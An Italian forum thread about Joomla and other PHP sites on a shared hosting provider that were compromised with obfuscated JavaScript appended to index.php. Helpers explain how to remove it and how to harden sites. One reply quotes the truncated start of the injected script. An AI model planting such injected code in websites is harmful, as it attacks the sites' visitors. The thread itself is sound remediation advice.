Attacco Hacker su sgaragnao? Joomla su sgaragnao si comporta strana...

[nickymancini]

Ciao a tutti e sono nuovo del forum... ho un sitarello su sgaragnao, con Joomla 1.5.15 ma sia questo, sia un altro sito sempre su sgaragnao si comporta in modo strano, noto nella barra di stato che durante il loading del sito web c'è un "attendere caricamento da http://piadshfpiuadsh.com (le lettere sono a caso perchè appaiono incomprensibili e a caso)... dopo di che il sito chiude il browser, ma se lo riapro funziona. Stessa cosa nell'altro sito che non usa Joomla. Sembra che ci sia un attacco hacker su sgaragnao, confermate? che devo fare?

se qualcuno vuol vedere di che si tratta, il sito è http://www.morettatube.com

Thanks!

[maicolstaip]

Benvenuto nel forum di joomla.it nickymancini,
apri via ftp l'index.php del tuo template e comincia a cancellare tutto quello che trovi alla fine del file, dopo

Codice: [Seleziona]

</body>

</html>
La parte da cancellare comincia per

Codice: [Seleziona]

script language="javascript">function t(){return z($a);}var $a="Z64aZ3dZ22fqb0t-
etc
etc

Di sicuro il sito è stato compromesso.

[nickymancini]

Innanzi tutto volevo ringraziarti infinitamente per la tempestività con cui ho avuto risposta!
Ora provvedo a cancellare quanto detto, ho anche cambiato la pass via ftp come letto da un'altra parte.
In secondo luogo volevo segnalare altri siti smpre sullo stesso hosting che sembrano stati essere attaccati (da quanto ho letto l'attacco hacker al web hosting "nazionale"... sembra aver colpito tutti i siti che hanno php...
Gli altri miei che sembrano compromessi sono
http://www.talentrama.com
http://www.condominiolowcost.com

suppongo anche in questi vi sia lo stesso tipo di problema...
grazie di nuovo!

[nickymancini]

Risolto, in effetti l'infezione è ben visibile e da certamente nell'occhio in index.php...
quel che mi chiedo è: un hosting che "gode" di una certa popolarità, visto che non posso norminarlo se non come sgaragnao... non è hackerproof da certi attacchi? cioè voglio dire, con tutto quello che si paga, un minimo di garanzia...
ho pulito anche l'index.php di www.talentrama.com ma ora rimane un errore di loading feed data...
credo tuttavia non sia connesso il tipo di problema all'infezione hacker...

[mau_develop]

scusa ma di chi ti viene questa notizia?

i tuoi addons erano/sono tutti all'ultima release?

M.

[jeckodevelopment]

- Nessun hosting è hackerproof
- Potrebbe anche dipendere dai permessi file che imposti tu
- Se non usi tutte le ultime versioni di Joomla e relative estensioni non è colpa dell'hosting

[MaxP4]

Da ieri anche quasi tutti i miei siti su quel famoso provider di Arezzo che si chiama come quella famosa isola (dove andrò io a breve se continua 'sto casino) sono stati attaccati con successo. Non solo i siti con Joomla! ma anche un paio di siti dove non c'era niente se non una index.php con scritto "in allestimento" e che non erano mai stati né aperti né altro.

Quindi a questo punto direi che né Joomla! né le sue extension c'entrino, ma che sia un problema proprio di... e diciamolo... S G A R A G N A O! 

[bigham]

Non posso mettere i link che ho trovato ma vi basterebbe fare una ricerca con google usando i termini: inclusione javascript seguiti dal nome dell'innominabile servizio di hosting. Vedrete qualche sorpresa.

Si può invece, per cho non lo avesse fatto, utilizzare il file htaccess per impedire l'inclusione di file da remoto. E questo articolo ne da una descrizione.

In generale gran parte della sicurezza dipende dal servizio di hosting, ma questo pochi lo valutano a priori.